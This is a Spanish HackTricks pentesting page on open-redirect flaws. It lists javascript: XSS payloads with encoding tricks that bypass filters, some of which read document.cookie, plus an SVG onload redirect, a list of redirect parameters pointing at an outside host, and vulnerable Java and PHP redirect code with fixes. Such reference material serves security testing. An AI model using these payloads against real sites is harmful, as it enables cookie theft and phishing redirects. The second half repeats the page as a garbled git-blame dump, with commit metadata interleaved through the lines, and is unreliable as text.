hacktricks/pentesting-web/open-redirect.md

<details>

<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si deseas ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Obtén el [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Comparte tus trucos de hacking enviando PRs a los** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositorios de github.

</details>


# Redirección abierta

## Redirección a localhost o dominios arbitrarios

{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)
{% endcontent-ref %}

## Redirección abierta a XSS
```bash
#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)

#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)

#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL os PHP
javascript://%250Aalert(1)

#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0

#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//
```
# Redirección abierta al cargar archivos svg

--- 

When a web application allows users to upload files, it can be vulnerable to an open redirect attack if the application does not properly validate the uploaded file's content. An attacker can upload a specially crafted SVG file containing JavaScript code that redirects users to a malicious website.

---

Cuando una aplicación web permite a los usuarios cargar archivos, puede ser vulnerable a un ataque de redirección abierta si la aplicación no valida adecuadamente el contenido del archivo cargado. Un atacante puede cargar un archivo SVG especialmente diseñado que contenga código JavaScript que redirige a los usuarios a un sitio web malicioso.
```markup
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
</code>
```
# Parámetros comunes de inyección
```
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://c1h2e1.github.io
data=https://c1h2e1.github.io
qurl=https://c1h2e1.github.io
login=https://c1h2e1.github.io
logout=https://c1h2e1.github.io
ext=https://c1h2e1.github.io
clickurl=https://c1h2e1.github.io
goto=https://c1h2e1.github.io
rit_url=https://c1h2e1.github.io
forward_url=https://c1h2e1.github.io
@https://c1h2e1.github.io
forward=https://c1h2e1.github.io
pic=https://c1h2e1.github.io
callback_url=https://c1h2e1.github.io
jump=https://c1h2e1.github.io
jump_url=https://c1h2e1.github.io
click?u=https://c1h2e1.github.io
originUrl=https://c1h2e1.github.io
origin=https://c1h2e1.github.io
Url=https://c1h2e1.github.io
desturl=https://c1h2e1.github.io
u=https://c1h2e1.github.io
page=https://c1h2e1.github.io
u1=https://c1h2e1.github.io
action=https://c1h2e1.github.io
action_url=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
sp_url=https://c1h2e1.github.io
service=https://c1h2e1.github.io
recurl=https://c1h2e1.github.io
j?url=https://c1h2e1.github.io
url=//https://c1h2e1.github.io
uri=https://c1h2e1.github.io
u=https://c1h2e1.github.io
allinurl:https://c1h2e1.github.io
q=https://c1h2e1.github.io
link=https://c1h2e1.github.io
src=https://c1h2e1.github.io
tc?src=https://c1h2e1.github.io
linkAddress=https://c1h2e1.github.io
location=https://c1h2e1.github.io
burl=https://c1h2e1.github.io
request=https://c1h2e1.github.io
backurl=https://c1h2e1.github.io
RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io
```
# Ejemplos de código

### .Net
```bash
response.redirect("~/mysafe-subdomain/login.aspx")
```
### Java

#### Open Redirect

An open redirect occurs when a web application redirects to a user-supplied link without proper validation. Attackers can abuse this vulnerability to redirect users to malicious websites, phishing pages, or other harmful content.

##### Example

Consider the following vulnerable Java code snippet:

```java
String redirectUrl = request.getParameter("redirect_url");
response.sendRedirect(redirectUrl);
```

In this example, the application blindly redirects users to the URL supplied via the `redirect_url` parameter without any validation. An attacker can craft a malicious link like `http://vulnerable-website.com/?redirect_url=http://malicious-website.com` to redirect users to a harmful website.

##### Prevention

To prevent open redirect vulnerabilities in Java applications, always validate and sanitize user input before using it to redirect users. Whitelist allowed URLs or domains and ensure that the redirect URL belongs to the expected domain.
```bash
response.redirect("http://mysafedomain.com");
```
### PHP

#### Redirección abierta

Una redirección abierta ocurre cuando una aplicación web redirige al usuario a una URL especificada en el parámetro de la solicitud sin validarla adecuadamente. Esto puede ser explotado por un atacante para dirigir a la víctima a un sitio malicioso, como un sitio de phishing o de malware.

##### Ejemplo

```php
<?php
$redirectUrl = $_GET['url'];
header('Location: ' . $redirectUrl);
?>
```

En este ejemplo, el valor de `url` se toma directamente de la solicitud GET y se utiliza para redirigir al usuario. Un atacante podría crear un enlace malicioso como `http://example.com/open-redirect.php?url=http://malicioussite.com` para redirigir a los usuarios a un sitio malicioso sin su conocimiento.

##### Prevención

Para prevenir la redirección abierta, se debe validar y filtrar cualquier URL proporcionada por el usuario antes de utilizarla en la redirección. Se pueden utilizar listas blancas de dominios permitidos o expresiones regulares para validar las URL y asegurarse de que solo se redirija a destinos seguros.
```php
<?php
/* browser redirections*/
header("Location: http://mysafedomain.com");
exit;
?>
```
# Herramientas

* [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)

# Recursos

* En [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) puedes encontrar listas de fuzzing.\
* [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)\
* [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
* [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)


<details>

<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si deseas ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Obtén el [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
f 2023-06-05 20:33:24 +02:00			`<details>`

Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
f 2023-06-05 20:33:24 +02:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`Otras formas de apoyar a HackTricks:`
f 2023-06-05 20:33:24 +02:00
Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00			`* Si deseas ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`* Obtén el [oficial PEASS & HackTricks swag](https://peass.creator-spring.com)`
Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00			`* Descubre [La Familia PEASS](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Únete al 💬 [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o síguenos en Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`* Comparte tus trucos de hacking enviando PRs a los [HackTricks](https://github.com/carlospolop/hacktricks) y [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repositorios de github.`
f 2023-06-05 20:33:24 +02:00
			`</details>`


			`# Redirección abierta`

			`## Redirección a localhost o dominios arbitrarios`

			`{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}`
			`[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)`
			`{% endcontent-ref %}`

			`## Redirección abierta a XSS`
			```bash
			`#Basic payload, javascript code is executed after "javascript:"`
			`javascript:alert(1)`

			`#Bypass "javascript" word filter with CRLF`
			`java%0d%0ascript%0d%0a:alert(0)`

			`#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed`
			`#This bypasses FILTER_VALIDATE_URL os PHP`
			`javascript://%250Aalert(1)`

			`#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)`
			`javascript://%250Aalert(1)//?1`
			`javascript://%250A1?alert(1):0`

			`#Others`
			`%09Jav%09ascript:alert(document.domain)`
			`javascript://%250Alert(document.location=document.cookie)`
			`/%09/javascript:alert(1);`
			`/%09/javascript:alert(1)`
			`//%5cjavascript:alert(1);`
			`//%5cjavascript:alert(1)`
			`/%5cjavascript:alert(1);`
			`/%5cjavascript:alert(1)`
			`javascript://%0aalert(1)`
			`<>javascript:alert(1);`
			`//javascript:alert(1);`
			`//javascript:alert(1)`
			`/javascript:alert(1);`
			`/javascript:alert(1)`
			`\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)`
			`javascript:alert(1);`
			`javascript:alert(1)`
			`javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)`
			`javascript:confirm(1)`
			`javascript://https://whitelisted.com/?z=%0Aalert(1)`
			`javascript:prompt(1)`
			`jaVAscript://whitelisted.com//%0d%0aalert(1);//`
			`javascript://whitelisted.com?%a0alert%281%29`
			`/x:1/:///%01javascript:alert(document.cookie)/`
			`";alert(0);//`
			```
			`# Redirección abierta al cargar archivos svg`
Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00
			`---`

			`When a web application allows users to upload files, it can be vulnerable to an open redirect attack if the application does not properly validate the uploaded file's content. An attacker can upload a specially crafted SVG file containing JavaScript code that redirects users to a malicious website.`

			`---`

			`Cuando una aplicación web permite a los usuarios cargar archivos, puede ser vulnerable a un ataque de redirección abierta si la aplicación no valida adecuadamente el contenido del archivo cargado. Un atacante puede cargar un archivo SVG especialmente diseñado que contenga código JavaScript que redirige a los usuarios a un sitio web malicioso.`
f 2023-06-05 20:33:24 +02:00			```markup
			`<code>`
			`<?xml version="1.0" encoding="UTF-8" standalone="yes"?>`
			`<svg`
			`onload="window.location='http://www.example.com'"`
			`xmlns="http://www.w3.org/2000/svg">`
			`</svg>`
			`</code>`
			```
			`# Parámetros comunes de inyección`
			```
			`/{payload}`
			`?next={payload}`
			`?url={payload}`
			`?target={payload}`
			`?rurl={payload}`
			`?dest={payload}`
			`?destination={payload}`
			`?redir={payload}`
			`?redirect_uri={payload}`
			`?redirect_url={payload}`
			`?redirect={payload}`
			`/redirect/{payload}`
			`/cgi-bin/redirect.cgi?{payload}`
			`/out/{payload}`
			`/out?{payload}`
			`?view={payload}`
			`/login?to={payload}`
			`?image_url={payload}`
			`?go={payload}`
			`?return={payload}`
			`?returnTo={payload}`
			`?return_to={payload}`
			`?checkout_url={payload}`
			`?continue={payload}`
			`?return_path={payload}`
			`success=https://c1h2e1.github.io`
			`data=https://c1h2e1.github.io`
			`qurl=https://c1h2e1.github.io`
			`login=https://c1h2e1.github.io`
			`logout=https://c1h2e1.github.io`
			`ext=https://c1h2e1.github.io`
			`clickurl=https://c1h2e1.github.io`
			`goto=https://c1h2e1.github.io`
			`rit_url=https://c1h2e1.github.io`
			`forward_url=https://c1h2e1.github.io`
			`@https://c1h2e1.github.io`
			`forward=https://c1h2e1.github.io`
			`pic=https://c1h2e1.github.io`
			`callback_url=https://c1h2e1.github.io`
			`jump=https://c1h2e1.github.io`
			`jump_url=https://c1h2e1.github.io`
			`click?u=https://c1h2e1.github.io`
			`originUrl=https://c1h2e1.github.io`
			`origin=https://c1h2e1.github.io`
			`Url=https://c1h2e1.github.io`
			`desturl=https://c1h2e1.github.io`
			`u=https://c1h2e1.github.io`
			`page=https://c1h2e1.github.io`
			`u1=https://c1h2e1.github.io`
			`action=https://c1h2e1.github.io`
			`action_url=https://c1h2e1.github.io`
			`Redirect=https://c1h2e1.github.io`
			`sp_url=https://c1h2e1.github.io`
			`service=https://c1h2e1.github.io`
			`recurl=https://c1h2e1.github.io`
			`j?url=https://c1h2e1.github.io`
			`url=//https://c1h2e1.github.io`
			`uri=https://c1h2e1.github.io`
			`u=https://c1h2e1.github.io`
			`allinurl:https://c1h2e1.github.io`
			`q=https://c1h2e1.github.io`
			`link=https://c1h2e1.github.io`
			`src=https://c1h2e1.github.io`
			`tc?src=https://c1h2e1.github.io`
			`linkAddress=https://c1h2e1.github.io`
			`location=https://c1h2e1.github.io`
			`burl=https://c1h2e1.github.io`
			`request=https://c1h2e1.github.io`
			`backurl=https://c1h2e1.github.io`
			`RedirectUrl=https://c1h2e1.github.io`
			`Redirect=https://c1h2e1.github.io`
			`ReturnUrl=https://c1h2e1.github.io`
			```
			`# Ejemplos de código`

			`### .Net`
			```bash
			`response.redirect("~/mysafe-subdomain/login.aspx")`
			```
			`### Java`

			`#### Open Redirect`

Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00			`An open redirect occurs when a web application redirects to a user-supplied link without proper validation. Attackers can abuse this vulnerability to redirect users to malicious websites, phishing pages, or other harmful content.`
f 2023-06-05 20:33:24 +02:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`##### Example`
f 2023-06-05 20:33:24 +02:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`Consider the following vulnerable Java code snippet:`
f 2023-06-05 20:33:24 +02:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			```java
Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00			`String redirectUrl = request.getParameter("redirect_url");`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`response.sendRedirect(redirectUrl);`
f 2023-06-05 20:33:24 +02:00			```

Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00			In this example, the application blindly redirects users to the URL supplied via the `redirect_url` parameter without any validation. An attacker can craft a malicious link like `http://vulnerable-website.com/?redirect_url=http://malicious-website.com` to redirect users to a harmful website.
f 2023-06-05 20:33:24 +02:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`##### Prevention`
f 2023-06-05 20:33:24 +02:00
Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00			`To prevent open redirect vulnerabilities in Java applications, always validate and sanitize user input before using it to redirect users. Whitelist allowed URLs or domains and ensure that the redirect URL belongs to the expected domain.`
f 2023-06-05 20:33:24 +02:00			```bash
			`response.redirect("http://mysafedomain.com");`
			```
			`### PHP`

			`#### Redirección abierta`

Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00			`Una redirección abierta ocurre cuando una aplicación web redirige al usuario a una URL especificada en el parámetro de la solicitud sin validarla adecuadamente. Esto puede ser explotado por un atacante para dirigir a la víctima a un sitio malicioso, como un sitio de phishing o de malware.`
f 2023-06-05 20:33:24 +02:00
Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00			`##### Ejemplo`
f 2023-06-05 20:33:24 +02:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			```php
f 2023-06-05 20:33:24 +02:00			`<?php`
Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00			`$redirectUrl = $_GET['url'];`
			`header('Location: ' . $redirectUrl);`
f 2023-06-05 20:33:24 +02:00			`?>`
			```

Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00			En este ejemplo, el valor de `url` se toma directamente de la solicitud GET y se utiliza para redirigir al usuario. Un atacante podría crear un enlace malicioso como `http://example.com/open-redirect.php?url=http://malicioussite.com` para redirigir a los usuarios a un sitio malicioso sin su conocimiento.
f 2023-06-05 20:33:24 +02:00
Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00			`##### Prevención`
f 2023-06-05 20:33:24 +02:00
Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00			`Para prevenir la redirección abierta, se debe validar y filtrar cualquier URL proporcionada por el usuario antes de utilizarla en la redirección. Se pueden utilizar listas blancas de dominios permitidos o expresiones regulares para validar las URL y asegurarse de que solo se redirija a destinos seguros.`
f 2023-06-05 20:33:24 +02:00			```php
			`<?php`
			`/* browser redirections*/`
			`header("Location: http://mysafedomain.com");`
			`exit;`
			`?>`
			```
			`# Herramientas`

			`* [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)`

			`# Recursos`

Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`* En [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) puedes encontrar listas de fuzzing.\`
			`* [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)\`
			`* [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)`
			`* [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)`
f 2023-06-05 20:33:24 +02:00

			`<details>`

Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
f 2023-06-05 20:33:24 +02:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`Otras formas de apoyar a HackTricks:`
f 2023-06-05 20:33:24 +02:00
Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00			`* Si deseas ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`* Obtén el [oficial PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Descubre [The PEASS Family](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00			`* Únete al 💬 [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o síguenos en Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`* Comparte tus trucos de hacking enviando PRs a los repositorios de [HackTricks](https://github.com/carlospolop/hacktricks) y [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`
f 2023-06-05 20:33:24 +02:00
			`</details>`